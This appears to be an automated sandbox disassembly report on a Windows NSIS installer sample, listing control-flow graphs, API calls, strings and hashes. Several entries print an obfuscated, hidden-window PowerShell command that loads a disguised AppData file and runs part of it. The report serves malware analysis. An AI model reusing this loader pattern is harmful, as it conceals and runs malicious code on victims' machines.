                                                                                                    control_flow_graph 491 401759-40177c call 402bce call 405ad9 496 401786-401798 call 4060d4 call 405a6c lstrcatA 491->496 497 40177e-401784 call 4060d4 491->497 503 40179d-4017a3 call 4063af 496->503 497->503 507 4017a8-4017ac 503->507 508 4017ae-4017b8 call 406448 507->508 509 4017df-4017e2 507->509 517 4017ca-4017dc 508->517 518 4017ba-4017c8 CompareFileTime 508->518 511 4017e4-4017e5 call 405c48 509->511 512 4017ea-401806 call 405c6d 509->512 511->512 519 401808-40180b 512->519 520 40187e-4018a7 call 4051fb call 4030d8 512->520 517->509 518->517 521 401860-40186a call 4051fb 519->521 522 40180d-40184f call 4060d4 * 2 call 406167 call 4060d4 call 4057f0 519->522 534 4018a9-4018ad 520->534 535 4018af-4018bb SetFileTime 520->535 532 401873-401879 521->532 522->507 555 401855-401856 522->555 536 402a63 532->536 534->535 538 4018c1-4018cc CloseHandle 534->538 535->538 540 402a65-402a69 536->540 541 4018d2-4018d5 538->541 542 402a5a-402a5d 538->542 544 4018d7-4018e8 call 406167 lstrcatA 541->544 545 4018ea-4018ed call 406167 541->545 542->536 550 4018f2-40238c call 4057f0 544->550 545->550 550->540 550->542 555->532 557 401858-401859 555->557 557->521
                                                                                                    APIs
                                                                                                    • lstrcatA.KERNEL32(00000000,00000000,powershell.exe -windowstyle hidden "$Retskrivningsreformer=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Tegnkapacitet\Dyretmmeren.Lge';$Sammenskriv=$Retskrivningsreformer.SubString(71921,3);.$Sammenskriv($Retskrivningsreformer) ",C:\Users\user\AppData\Roaming\skittaget\lektier\Hemodilution,00000000,00000000,00000031), ref: 00401798
                                                                                                    • CompareFileTime.KERNEL32(-00000014,?,powershell.exe -windowstyle hidden "$Retskrivningsreformer=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Tegnkapacitet\Dyretmmeren.Lge';$Sammenskriv=$Retskrivningsreformer.SubString(71921,3);.$Sammenskriv($Retskrivningsreformer) ",powershell.exe -windowstyle hidden "$Retskrivningsreformer=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Tegnkapacitet\Dyretmmeren.Lge';$Sammenskriv=$Retskrivningsreformer.SubString(71921,3);.$Sammenskriv($Retskrivningsreformer) ",00000000,00000000,powershell.exe -windowstyle hidden "$Retskrivningsreformer=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Tegnkapacitet\Dyretmmeren.Lge';$Sammenskriv=$Retskrivningsreformer.SubString(71921,3);.$Sammenskriv($Retskrivningsreformer) ",C:\Users\user\AppData\Roaming\skittaget\lektier\Hemodilution,00000000,00000000,00000031), ref: 004017C2
                                                                                                      • Part of subcall function 004060D4: lstrcpynA.KERNEL32(?,?,00000400,004033F7,Bysamfund,NSIS Error,?,00000007,00000009,0000000B), ref: 004060E1
                                                                                                      • Part of subcall function 004051FB: lstrlenA.KERNEL32(subterritories,00000000,00799A22,759223A0,?,?,?,?,?,?,?,?,?,00403210,00000000,?), ref: 00405234
                                                                                                      • Part of subcall function 004051FB: lstrlenA.KERNEL32(00403210,subterritories,00000000,00799A22,759223A0,?,?,?,?,?,?,?,?,?,00403210,00000000), ref: 00405244
                                                                                                      • Part of subcall function 004051FB: lstrcatA.KERNEL32(subterritories,00403210,00403210,subterritories,00000000,00799A22,759223A0), ref: 00405257
                                                                                                      • Part of subcall function 004051FB: SetWindowTextA.USER32(subterritories,subterritories), ref: 00405269
                                                                                                      • Part of subcall function 004051FB: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040528F
                                                                                                      • Part of subcall function 004051FB: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052A9
                                                                                                      • Part of subcall function 004051FB: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052B7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                                                    • String ID: C:\Users\Public\Pictures\shopkeeping\legio.Per$C:\Users\user\AppData\Roaming\skittaget\lektier\Hemodilution$Haste.n$$hattepuldes\Stethospasm84\$powershell.exe -windowstyle hidden "$Retskrivningsreformer=Get-Content -raw 'C:\Users\user\AppData\Roaming\skittaget\lektier\Tegnkapacitet\Dyretmmeren.Lge';$Sammenskriv=$Retskrivningsreformer.SubString(71921,3);.$Sammenskriv($Retskrivningsreformer) "
                                                                                                    • API String ID: 1941528284-406281928
                                                                                                    • Opcode ID: 27c6483c7b4cfa6faaba688c328a885ad54841229a436ed7b4835cb8198ee252
                                                                                                    • Instruction ID: fd3b8c6ffda923ee712ccabd95e062e364f7e6d0f101aa5c62542bd457b9e8d3
                                                                                                    • Opcode Fuzzy Hash: 27c6483c7b4cfa6faaba688c328a885ad54841229a436ed7b4835cb8198ee252
                                                                                                    • Instruction Fuzzy Hash: F841B571900114BACF10BFB5CC45DAF36A9EF45368B20833BF522B50E2CA7C8A519B6D

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 558 4030d8-4030ec 559 4030f5-4030fe 558->559 560 4030ee 558->560 561 403100 559->561 562 403107-40310c 559->562 560->559 561->562 563 40311c-403129 call 4032c7 562->563 564 40310e-403117 call 4032dd 562->564 568 4032b5 563->568 569 40312f-403133 563->569 564->563 570 4032b7-4032b8 568->570 571 403260-403262 569->571 572 403139-40315f GetTickCount 569->572 575 4032c0-4032c4 570->575 573 4032a2-4032a5 571->573 574 403264-403267 571->574 576 403165-40316d 572->576 577 4032bd 572->577 581 4032a7 573->581 582 4032aa-4032b3 call 4032c7 573->582 574->577 578 403269 574->578 579 403172-403180 call 4032c7 576->579 580 40316f 576->580 577->575 584 40326c-403272 578->584 579->568 592 403186-40318f 579->592 580->579 581->582 582->568 590 4032ba 582->590 587 403274 584->587 588 403276-403284 call 4032c7 584->588 587->588 588->568 595 403286-403292 call 405d14 588->595 590->577 594 403195-4031b5 call 406602 592->594 600 403258-40325a 594->600 601 4031bb-4031ce GetTickCount 594->601 602 403294-40329e 595->602 603 40325c-40325e 595->603 600->570 604 4031d0-4031d8 601->604 605 403213-403215 601->605 602->584 610 4032a0 602->610 603->570 606 4031e0-40320b MulDiv wsprintfA call 4051fb 604->606 607 4031da-4031de 604->607 608 403217-40321b 605->608 609 40324c-403250 605->609 615 403210 606->615 607->605 607->606 612 403232-40323d 608->612 613 40321d-403224 call 405d14 608->613 609->576 614 403256 609->614 610->577 617 403240-403244 612->617 618 403229-40322b 613->618 614->577 615->605 617->594 619 40324a 617->619 618->603 620 40322d-403230 618->620 619->577 620->617
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CountTick$wsprintf
                                                                                                    • String ID: !y$ !y$ ay$... %d%%
                                                                                                    • API String ID: 551687249-830929277
                                                                                                    • Opcode ID: fb80ba013608f3c098533986785ac97089a2e466ddceb92ce4d814dff21de19d
                                                                                                    • Instruction ID: a0ed304c84634e1a182b4cedd43d653909124c4238878ead4aa9bd0ee2fb7366
                                                                                                    • Opcode Fuzzy Hash: fb80ba013608f3c098533986785ac97089a2e466ddceb92ce4d814dff21de19d
                                                                                                    • Instruction Fuzzy Hash: CE516E31800219ABCB10DFA5DA44A9F7BB8EF44756F1481BFE800B72D0C7389F448BA9

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 621 4051fb-405210 622 4052c6-4052ca 621->622 623 405216-405228 621->623 624 405233-40523f lstrlenA 623->624 625 40522a-40522e call 406167 623->625 627 405241-405251 lstrlenA 624->627 628 40525c-405260 624->628 625->624 627->622 629 405253-405257 lstrcatA 627->629 630 405262-405269 SetWindowTextA 628->630 631 40526f-405273 628->631 629->628 630->631 632 405275-4052b7 SendMessageA * 3 631->632 633 4052b9-4052bb 631->633 632->633 633->622 634 4052bd-4052c0 633->634 634->622
                                                                                                    APIs
                                                                                                    • lstrlenA.KERNEL32(subterritories,00000000,00799A22,759223A0,?,?,?,?,?,?,?,?,?,00403210,00000000,?), ref: 00405234
                                                                                                    • lstrlenA.KERNEL32(00403210,subterritories,00000000,00799A22,759223A0,?,?,?,?,?,?,?,?,?,00403210,00000000), ref: 00405244
                                                                                                    • lstrcatA.KERNEL32(subterritories,00403210,00403210,subterritories,00000000,00799A22,759223A0), ref: 00405257
                                                                                                    • SetWindowTextA.USER32(subterritories,subterritories), ref: 00405269
                                                                                                    • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040528F
                                                                                                    • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052A9
                                                                                                    • SendMessageA.USER32(?,00001013,?,00000000), ref: 004052B7
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                    • String ID: subterritories
                                                                                                    • API String ID: 2531174081-2942025731
                                                                                                    • Opcode ID: 84dc479b8b7881d3249495fb7370a8664623c8244ac58232fd13fde5de382175
                                                                                                    • Instruction ID: 95508abd931072ea88f050004e9a273e6bd30dde68a0f7ca5354031f7b80a04f
                                                                                                    • Opcode Fuzzy Hash: 84dc479b8b7881d3249495fb7370a8664623c8244ac58232fd13fde5de382175
                                                                                                    • Instruction Fuzzy Hash: A521A175900118BBDF119FA9DD809DFBFB9EF09354F1480BAF544B6291C6388E408F98

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 635 40646f-40648f GetSystemDirectoryA 636 406491 635->636 637 406493-406495 635->637 636->637 638 4064a5-4064a7 637->638 639 406497-40649f 637->639 641 4064a8-4064da wsprintfA LoadLibraryExA 638->641 639->638 640 4064a1-4064a3 639->640 640->641
                                                                                                    APIs
                                                                                                    • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406486
                                                                                                    • wsprintfA.USER32 ref: 004064BF
                                                                                                    • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004064D3
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                    • String ID: %s%s.dll$UXTHEME$\
                                                                                                    • API String ID: 2200240437-4240819195
                                                                                                    • Opcode ID: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                                                                    • Instruction ID: e4af93c3cdb1388bd8c61da79080aae0fca49bc102c632b45afecef183fab820
                                                                                                    • Opcode Fuzzy Hash: 265ca81b40b881dab18d3809a90e9c8d4eed5c2f9756e13f598d1e00e091b07b
                                                                                                    • Instruction Fuzzy Hash: D3F0F63055020AABEF159B64DD0DFEB375CEB08344F1400BAA986E10C1EA78D9258BAD

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 642 405c9c-405ca6 643 405ca7-405cd2 GetTickCount GetTempFileNameA 642->643 644 405ce1-405ce3 643->644 645 405cd4-405cd6 643->645 647 405cdb-405cde 644->647 645->643 646 405cd8 645->646 646->647
                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32 ref: 00405CB0
                                                                                                    • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405CCA
                                                                                                    Strings
                                                                                                    • nsa, xrefs: 00405CA7
                                                                                                    • "C:\Users\user\Desktop\dP5z8RpEyQ.exe", xrefs: 00405C9C
                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405C9F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CountFileNameTempTick
                                                                                                    • String ID: "C:\Users\user\Desktop\dP5z8RpEyQ.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                    • API String ID: 1716503409-50875161
                                                                                                    • Opcode ID: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                                                                    • Instruction ID: 300c2e40aa17b99eb6a72bfbf7bdfcd49c284ecfca22a4765a13b30c42836751
                                                                                                    • Opcode Fuzzy Hash: 3d6f8019ec5f34494dc3b68805de6783e4b5f3688fe49378b00e43b1512e0d50
                                                                                                    • Instruction Fuzzy Hash: B7F08236308308ABEB108F56ED04B9B7B98EF91750F14803BF944DA280D6B599549B68

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 648 402476-4024a7 call 402bce * 2 call 402c5e 655 402a5a-402a69 648->655 656 4024ad-4024b7 648->656 658 4024c7-4024ca 656->658 659 4024b9-4024c6 call 402bce lstrlenA 656->659 661 4024e1-4024e4 658->661 662 4024cc-4024e0 call 402bac 658->662 659->658 666 4024f5-402509 RegSetValueExA 661->666 667 4024e6-4024f0 call 4030d8 661->667 662->661 670 40250b 666->670 671 40250e-4025eb RegCloseKey 666->671 667->666 670->671 671->655
                                                                                                    APIs
                                                                                                    • lstrlenA.KERNEL32(hattepuldes\Stethospasm84\,00000023,?,00000000,00000002,00000011,00000002), ref: 004024C1
                                                                                                    • RegSetValueExA.KERNELBASE(?,?,?,?,hattepuldes\Stethospasm84\,00000000,?,00000000,00000002,00000011,00000002), ref: 00402501
                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,hattepuldes\Stethospasm84\,00000000,?,00000000,00000002,00000011,00000002), ref: 004025E5
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseValuelstrlen
                                                                                                    • String ID: hattepuldes\Stethospasm84\
                                                                                                    • API String ID: 2655323295-3628054739
                                                                                                    • Opcode ID: 9a6c6d883b07e3aa4fb4fac5b967dc2d5c57ac0b71ef490e589c7d9f7fbbccc2
                                                                                                    • Instruction ID: 621c84a53dcaf2a3225fca01673abe6cb58a25da7017df2cdf0d3381b538cbef
                                                                                                    • Opcode Fuzzy Hash: 9a6c6d883b07e3aa4fb4fac5b967dc2d5c57ac0b71ef490e589c7d9f7fbbccc2
                                                                                                    • Instruction Fuzzy Hash: A1118171E00214BFEF10AFA5DE49EAE7A74EB44314F20843AF505F71D1D6B99D419B28

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 673 4015bb-4015ce call 402bce call 405b05 678 4015d0-4015e3 call 405a97 673->678 679 401624-401627 673->679 686 4015e5-4015e8 678->686 687 4015fb-4015fc call 40573e 678->687 681 401652-4022e2 call 401423 679->681 682 401629-401644 call 401423 call 4060d4 SetCurrentDirectoryA 679->682 696 402a5a-402a69 681->696 682->696 698 40164a-40164d 682->698 686->687 691 4015ea-4015f1 call 40575b 686->691 694 401601-401603 687->694 691->687 703 4015f3-4015f9 call 4056c1 691->703 699 401605-40160a 694->699 700 40161a-401622 694->700 698->696 704 401617 699->704 705 40160c-401615 GetFileAttributesA 699->705 700->678 700->679 703->694 704->700 705->700 705->704
                                                                                                    APIs
                                                                                                      • Part of subcall function 00405B05: CharNextA.USER32(?,?,007A0970,?,00405B71,007A0970,007A0970,75923410,?,C:\Users\user\AppData\Local\Temp\,004058BC,?,75923410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405B13
                                                                                                      • Part of subcall function 00405B05: CharNextA.USER32(00000000), ref: 00405B18
                                                                                                      • Part of subcall function 00405B05: CharNextA.USER32(00000000), ref: 00405B2C
                                                                                                    • GetFileAttributesA.KERNELBASE(00000000,00000000,00000000,0000005C,00000000,000000F0), ref: 0040160D
                                                                                                      • Part of subcall function 004056C1: CreateDirectoryA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405704
                                                                                                    • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\AppData\Roaming\skittaget\lektier\Hemodilution,00000000,00000000,000000F0), ref: 0040163C
                                                                                                    Strings
                                                                                                    • C:\Users\user\AppData\Roaming\skittaget\lektier\Hemodilution, xrefs: 00401631
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2035099259.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_dP5z8RpEyQ.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                    • String ID: C:\Users\user\AppData\Roaming\skittaget\lektier\Hemodilution
                                                                                                    • API String ID: 1892508949-1527842708
                                                                                                    • Opcode ID: 0633b04426b33a91403708f63f53e35a8aea6b13c15c91267645d809cf00bc01
                                                                                                    • Instruction ID: 50be7771e3672f66fe07c9109d7a0934d5fb35c2f40f106ce03ebb8fd80801ba
                                                                                                    • Opcode Fuzzy Hash: 0633b04426b33a91403708f63f53e35a8aea6b13c15c91267645d809cf00bc01
                                                                                                    • Instruction Fuzzy Hash: F2110831104151EBCB307FA54D409BF37B09A92324B28463FE592B22E3DA3D4942AA2E

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 709 405fbb-405fed call 405f5a 712 40602a 709->712 713 405fef-40601c RegQueryValueExA RegCloseKey 709->713 715 40602d-40602f 712->715 713->712 714 40601e-406022 713->714 714->715 716 406024-406028 714->716 716->712 716->715
                                                                                                    APIs
                                                                                                    • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,00000400,: Completed,?,?,?,?,00000002,: Completed,?,00406270,80000002), ref: 00406001
                                                                                                    • RegCloseKey.KERNELBASE(?,?,00406270,80000002,Software\Microsoft\Windows\CurrentVersion,: Completed,: Completed,: Completed,?,subterritories), ref: 0040600C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2034559954.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2034536936.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034585107.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2034607815.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
